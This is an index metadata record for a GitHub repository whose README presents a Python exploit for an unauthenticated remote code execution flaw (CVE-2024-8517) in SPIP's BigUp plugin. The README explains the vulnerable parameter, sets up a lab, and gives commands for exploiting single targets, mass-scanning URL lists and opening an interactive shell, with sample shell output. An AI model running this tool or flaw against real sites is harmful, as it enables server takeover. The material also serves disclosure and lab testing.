{"id":22799798,"url":"https://github.com/chocapikk/cve-2024-8517","last_synced_at":"2025-10-05T16:18:16.360Z","repository":{"id":255762333,"uuid":"853472932","full_name":"Chocapikk/CVE-2024-8517","owner":"Chocapikk","description":"SPIP BigUp Plugin Unauthenticated RCE","archived":false,"fork":false,"pushed_at":"2024-09-07T00:12:51.000Z","size":17,"stargazers_count":9,"open_issues_count":0,"forks_count":4,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-13T17:07:30.800Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"https://vozec.fr/researchs/spip-preauth-rce-2024-big-upload/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Chocapikk.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-06T18:17:18.000Z","updated_at":"2024-12-25T19:00:10.000Z","dependencies_parsed_at":"2024-09-07T02:39:35.541Z","dependency_job_id":"bd257907-e3f4-4c08-8b85-f6ac4f269cba","html_url":"https://github.com/Chocapikk/CVE-2024-8517","commit_stats":null,"previous_names":["chocapikk/cve-2024-8517"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8517","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8517/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8517/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8517/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Chocapikk","download_url":"https://codeload.github.com/Chocapikk/CVE-2024-8517/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248750109,"owners_count":21155686,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-12T07:09:59.812Z","updated_at":"2025-10-05T16:18:11.291Z","avatar_url":"https://github.com/Chocapikk.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ๐Ÿ˜ˆ SPIP BigUp Unauthenticated RCE Exploit ๐Ÿ˜ˆ\n\n## ๐Ÿ“œ Description\n\nThis Python script takes advantage of a **Remote Code Execution (RCE)** vulnerability in the **BigUp** plugin of **SPIP** (Systรจme de Publication pour l'Internet Partagรฉ). The problem occurs because the `lister_fichiers_par_champs` function does not properly check the data it receives when handling file uploads. When the `bigup_retrouver_fichiers` parameter is set to `1`, the function allows attackers to insert and run harmful PHP code on the server.\n\nWhat makes this flaw especially dangerous is that it does not require a login or any special permissions, as SPIP does not check who is allowed to use the BigUp feature. This issue affects SPIP versions up to and including **4.3.1**, **4.2.15**, and **4.1.17**.\n\n### ๐Ÿ”ฅ Vulnerable Versions:\n- **SPIP 4.0** to **SPIP 4.3.1**\n\n### ๐Ÿ›ก๏ธ Patched Versions:\n- **SPIP 4.3.2**, **SPIP 4.2.16**, and **SPIP 4.1.18**\n\nโš ๏ธ **Disclaimer**: Use this tool responsibly and only with explicit permission from the target environment's owner.\n\n## ๐Ÿš€ Features\n\n- ๐Ÿ” **Scan**: Scan single or multiple URLs for vulnerability.\n- ๐Ÿ’ป **Exploit**: Execute arbitrary commands on vulnerable targets.\n- ๐Ÿš **Interactive Shell**: Engage an interactive shell for continuous command execution.\n- ๐Ÿ’พ **Save Results**: Save vulnerable URLs to an output file.\n\n## ๐Ÿ› ๏ธ Lab Environment Setup\n\nTo replicate a vulnerable environment for testing, follow these steps:\n\n### 1. Download and Set Up SPIP\n\n```bash\nwget https://files.spip.net/spip/archives/spip-v4.3.1.zip\nmkdir spip\nmv spip-v4.3.1.zip spip\ncd spip\nunzip spip-v4.3.1.zip\n```\n\n### 2. Launch the SPIP Server\n\nStart a simple PHP server to serve the SPIP installation:\n\n```bash\nphp -S 0.0.0.0:8000\n```\n\nThe SPIP site will now be accessible at `http://localhost:8000`.\n\n### 3. Configure SPIP\n\nNavigate to `http://localhost:8000/ecrire` to complete the SPIP installation via the web interface.\n\n## ๐Ÿ› ๏ธ Usage\n\n### 1. Single URL Exploitation\n\nTo exploit a single URL, use the following command:\n\n```bash\npython exploit.py -u http://example.com\n```\n\n### 2. Multiple URLs Scanning\n\nTo scan a list of URLs for vulnerabilities, create a text file containing the URLs (one per line) and run:\n\n```bash\npython exploit.py -f urls.txt -t 50 -o vulnerable_urls.txt\n```\n\n- `-f` specifies the file containing URLs.\n- `-t` sets the number of threads for concurrent scanning.\n- `-o` specifies the output file to save vulnerable URLs.\n\n### 3. Interactive Shell\n\nIf a target is found to be vulnerable, the script automatically drops into an interactive shell where you can execute commands:\n\n```bash\n$ python exploit.py -u http://localhost:8000\nโœ… Target is vulnerable! Command Output: www-data\n\nโ„น๏ธ Interactive shell started. Type `exit` to quit.\n$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n```\n\n### 4. Using a Proxy\n\nYou can route the requests through a proxy by using the `--proxy` option:\n\n```bash\npython exploit.py -u http://example.com --proxy http://localhost:8080\n```\n\n## โš ๏ธ Legal Disclaimer\n\nThis tool is intended for educational purposes only and should only be used in environments where you have explicit permission to test. The author is not responsible for any misuse of this tool.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-8517","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchocapikk%2Fcve-2024-8517","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-8517/lists"}